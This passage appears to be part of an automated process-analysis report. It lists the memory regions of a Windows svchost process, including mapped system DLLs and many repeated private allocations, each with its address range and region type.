entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5258 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5259 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5260 start_va = 0x7fffe000 end_va = 0x7fffefff entry_point = 0x0 region_type = private name = "private_0x000000007fffe000" filename = "" Region: id = 5261 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5262 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5263 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5264 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5265 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5266 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5268 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5269 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5270 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5271 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5272 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5273 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5274 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5275 start_va = 0x140000000 end_va = 0x140038fff entry_point = 0x0 region_type = private name = "private_0x0000000140000000" filename = "" Region: id = 5276 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5277 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5278 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5279 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5286 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5288 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5289 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5291 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5292 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5294 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5295 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5297 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5298 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5300 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5301 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5303 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5304 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5306 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5307 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5309 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5310 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5312 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5313 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5315 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5316 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5318 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5319 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5321 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5322 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5324 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5325 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5327 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5328 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5330 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5331 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5333 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5334 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5336 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5337 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5339 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5340 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5342 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5343 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5345 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5346 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5348 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5349 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5351 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5352 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5354 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5355 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5357 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5358 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5360 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5361 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5363 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5364 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5366 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5367 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5369 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5370 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5372 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5373 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5375 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5376 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5378 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5379 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5381 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5382 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5384 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5385 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5387 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5388 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5390 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5391 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5393 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5394 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5396 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5397 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5399 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5400 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5402 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5403 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5405 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5406 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5408 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5409 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5411 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5412 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5414 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5415 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5417 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5418 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5420 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5421 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5423 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5424 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5426 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5427 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5429 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5430 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5432 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5433 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5435 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5436 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5438 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5439 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5441 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5442 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5444 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5445 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5447 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5448 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5450 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5451 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5453 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5454 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5456 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5457 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5459 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5460 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5462 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5463 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5465 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5466 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5468 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5469 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5471 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5472 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5474 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5475 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5477 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5478 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5480 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5481 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5483 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5484 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5486 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5487 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5489 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5490 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5492 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5493 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5495 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5496 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5498 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5499 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5501 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5502 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5504 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5505 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5507 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5508 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5510 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5511 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5513 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5514 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5516 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5517 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5519 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5520 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5522 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5523 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5524 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5525 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5526 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5527 start_va = 0xf0000 end_va = 0x118fff entry_point = 0xf0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5528 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 5529 start_va = 0xf0000 end_va = 0x118fff entry_point = 0xf0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5530 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5531 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5532 start_va = 0x380000 end_va = 0x43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 5533 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 5534 start_va = 0xf0000 end_va = 0xf6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 5535 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 5536 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 5537 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5538 start_va = 0x880000 end_va = 0xc72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 5539 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5541 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5542 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5544 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5545 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5547 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5548 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5549 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5551 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5552 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5554 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5555 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5557 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5558 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5560 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5561 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5563 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5564 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5566 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5567 